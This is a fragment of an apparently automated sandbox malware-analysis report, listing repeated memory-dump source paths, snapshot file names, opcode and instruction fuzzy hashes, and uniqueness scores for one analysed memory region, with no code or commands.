                                                              • Snapshot File: hcaresult_12_2_7ff849120000_qBJICEqiLNwXNBLrN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9d425dcf55f9389106d4d0b92061af91ca06e4ce56fa144da874ee8167ecd62d
                                                              • Instruction ID: 1ff3c54f39cd6a0eec83f1ce9460126c325f9c2e19676d8fef7ec3bdd1f57374
                                                              • Opcode Fuzzy Hash: 9d425dcf55f9389106d4d0b92061af91ca06e4ce56fa144da874ee8167ecd62d
                                                              • Instruction Fuzzy Hash: 6AD0122185F7C60FDB16BB7518150987F90AF03194B8945FFD0489B0D3E49D48598B41
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.3253839087.00007FF849120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff849120000_qBJICEqiLNwXNBLrN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.3253839087.00007FF849120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff849120000_qBJICEqiLNwXNBLrN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.3253839087.00007FF849120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849120000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_7ff849120000_qBJICEqiLNwXNBLrN.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ._^H$._^J$._^L$._^N
                                                              • API String ID: 0-3121379274
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%